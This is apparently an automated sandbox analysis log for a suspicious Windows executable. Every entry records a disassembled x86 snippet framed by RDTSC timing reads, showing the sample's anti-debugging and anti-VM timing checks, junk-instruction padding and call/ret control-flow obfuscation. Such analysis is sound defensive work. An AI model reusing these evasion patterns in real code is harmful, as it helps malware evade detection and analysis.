                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9618DA second address: 96193F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3853A999h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movzx edi, bx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FBD3853A988h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b call 00007FBD3853A98Ah 0x00000030 push esi 0x00000031 movzx edi, si 0x00000034 pop esi 0x00000035 pop edi 0x00000036 mov edi, dword ptr [ebp+122D3B8Eh] 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96193F second address: 961943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 961943 second address: 96194D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBD3853A986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96194D second address: 961957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FBD38D4D516h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9623CA second address: 9623E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3853A998h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962EE8 second address: 962EF2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBD38D4D516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96587F second address: 965883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964A91 second address: 964AAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38D4D527h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9668DC second address: 9668E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9668E2 second address: 96693F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FBD38D4D518h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 je 00007FBD38D4D51Ch 0x00000029 xor edi, 0E3CE256h 0x0000002f push 00000000h 0x00000031 xor edi, dword ptr [ebp+122D293Ch] 0x00000037 push 00000000h 0x00000039 pushad 0x0000003a mov eax, edi 0x0000003c mov dword ptr [ebp+124518D0h], edi 0x00000042 popad 0x00000043 xchg eax, esi 0x00000044 jc 00007FBD38D4D528h 0x0000004a push eax 0x0000004b push edx 0x0000004c jl 00007FBD38D4D516h 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96885B second address: 968869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD3853A98Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9698A6 second address: 9698BF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007FBD38D4D516h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 jp 00007FBD38D4D516h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9698BF second address: 9698C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9698C5 second address: 969945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38D4D524h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FBD38D4D518h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov ebx, dword ptr [ebp+122D2A72h] 0x0000002c push 00000000h 0x0000002e cmc 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FBD38D4D518h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b mov edi, dword ptr [ebp+122D3AD2h] 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FBD38D4D51Eh 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 969945 second address: 969976 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBD3853A98Eh 0x00000008 jnc 00007FBD3853A986h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBD3853A994h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CA69 second address: 96CA6F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CA6F second address: 96CA74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CA74 second address: 96CB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBD38D4D516h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e ja 00007FBD38D4D521h 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FBD38D4D518h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f add dword ptr [ebp+122D2455h], ebx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007FBD38D4D518h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 movsx edi, si 0x00000054 push 00000000h 0x00000056 or di, D39Eh 0x0000005b push edx 0x0000005c pop edi 0x0000005d xchg eax, esi 0x0000005e je 00007FBD38D4D533h 0x00000064 pushad 0x00000065 jmp 00007FBD38D4D525h 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DB53 second address: 96DB71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jg 00007FBD3853A986h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jns 00007FBD3853A986h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DC18 second address: 96DC1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CC5A second address: 96CD13 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FBD3853A996h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov ebx, dword ptr [ebp+122D3A52h] 0x00000014 push dword ptr fs:[00000000h] 0x0000001b jng 00007FBD3853A9A5h 0x00000021 pushad 0x00000022 call 00007FBD3853A999h 0x00000027 pop edx 0x00000028 mov si, cx 0x0000002b popad 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 jbe 00007FBD3853A98Ah 0x00000039 mov di, 5E0Ah 0x0000003d mov eax, dword ptr [ebp+122D07B1h] 0x00000043 push 00000000h 0x00000045 push ecx 0x00000046 call 00007FBD3853A988h 0x0000004b pop ecx 0x0000004c mov dword ptr [esp+04h], ecx 0x00000050 add dword ptr [esp+04h], 0000001Bh 0x00000058 inc ecx 0x00000059 push ecx 0x0000005a ret 0x0000005b pop ecx 0x0000005c ret 0x0000005d push FFFFFFFFh 0x0000005f jmp 00007FBD3853A98Bh 0x00000064 mov edi, dword ptr [ebp+122D3548h] 0x0000006a nop 0x0000006b jmp 00007FBD3853A990h 0x00000070 push eax 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 js 00007FBD3853A986h 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CD13 second address: 96CD2A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBD38D4D51Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CD2A second address: 96CD2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 970E15 second address: 970E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972EC2 second address: 972EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972EC6 second address: 972ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 970EE4 second address: 970EE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973EC2 second address: 973F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FBD38D4D518h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+1245D086h] 0x0000002b push 00000000h 0x0000002d jng 00007FBD38D4D51Ch 0x00000033 add dword ptr [ebp+122D5987h], ecx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007FBD38D4D518h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 0000001Ch 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 mov edi, dword ptr [ebp+122D29C5h] 0x0000005b mov ebx, dword ptr [ebp+122D3986h] 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007FBD38D4D51Fh 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9766FB second address: 9766FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9766FF second address: 976705 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976705 second address: 976720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBD3853A98Ah 0x00000008 ja 00007FBD3853A986h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97A089 second address: 97A096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97A096 second address: 97A0B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jmp 00007FBD3853A991h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97A0B8 second address: 97A0BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97D175 second address: 97D1BE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FBD3853A98Eh 0x00000008 pop ecx 0x00000009 jmp 00007FBD3853A996h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jne 00007FBD3853A998h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97D59B second address: 97D59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984B3E second address: 984B65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3853A98Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jng 00007FBD3853A98Eh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984B65 second address: 984B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007FBD38D4D518h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBD38D4D527h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984B8E second address: 984B98 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBD3853A98Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984CF4 second address: 984CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989C89 second address: 989C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988F6B second address: 988F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBD38D4D51Eh 0x0000000e jmp 00007FBD38D4D51Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988F8E second address: 988F92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98951D second address: 989537 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBD38D4D51Ch 0x0000000d jng 00007FBD38D4D516h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9897ED second address: 989809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBD3853A98Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FBD3853A986h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989AE8 second address: 989AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CBA3 second address: 91CBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FBD3853A996h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B3D0 second address: 95B3D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B616 second address: 95B61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B61A second address: 95B620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B6E2 second address: 95B6E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B6E8 second address: 95B6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B6EC second address: 95B736 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 call 00007FBD3853A993h 0x0000000e cmc 0x0000000f pop ecx 0x00000010 mov edi, dword ptr [ebp+122D3982h] 0x00000016 nop 0x00000017 push ebx 0x00000018 pushad 0x00000019 jl 00007FBD3853A986h 0x0000001f jnl 00007FBD3853A986h 0x00000025 popad 0x00000026 pop ebx 0x00000027 push eax 0x00000028 pushad 0x00000029 jmp 00007FBD3853A990h 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B736 second address: 95B73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B840 second address: 95B861 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBD3853A988h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FBD3853A98Bh 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B861 second address: 95B88B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBD38D4D51Ch 0x00000008 jbe 00007FBD38D4D516h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FBD38D4D520h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B88B second address: 95B898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FBD3853A986h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B898 second address: 95B89C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BD81 second address: 95BD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C12E second address: 95C1AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBD38D4D51Ah 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FBD38D4D518h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 jp 00007FBD38D4D519h 0x0000002e movsx ecx, bx 0x00000031 lea eax, dword ptr [ebp+12480CA4h] 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007FBD38D4D518h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov edx, dword ptr [ebp+122D38C6h] 0x00000057 pushad 0x00000058 add ecx, dword ptr [ebp+122D2A61h] 0x0000005e add cx, 8199h 0x00000063 popad 0x00000064 nop 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C1AB second address: 95C1AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C1AF second address: 95C1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBD38D4D51Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C1C6 second address: 95C1DC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBD3853A986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007FBD3853A986h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C1DC second address: 95C1E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C1E2 second address: 95C24E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBD3853A995h 0x00000008 jne 00007FBD3853A986h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FBD3853A988h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c mov ecx, dword ptr [ebp+122D396Ah] 0x00000032 jmp 00007FBD3853A995h 0x00000037 lea eax, dword ptr [ebp+12480C60h] 0x0000003d movsx ecx, ax 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 push ebx 0x00000044 pushad 0x00000045 popad 0x00000046 pop ebx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C24E second address: 95C269 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jl 00007FBD38D4D516h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBD38D4D51Bh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C269 second address: 95C26D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C26D second address: 943F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 jns 00007FBD38D4D51Eh 0x0000000e call dword ptr [ebp+122D27FDh] 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98F39E second address: 98F3A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98F3A2 second address: 98F3A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98F3A6 second address: 98F3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBD3853A994h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98F3C4 second address: 98F3C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FBE2 second address: 98FC15 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 jmp 00007FBD3853A992h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBD3853A997h 0x00000014 rdtsc
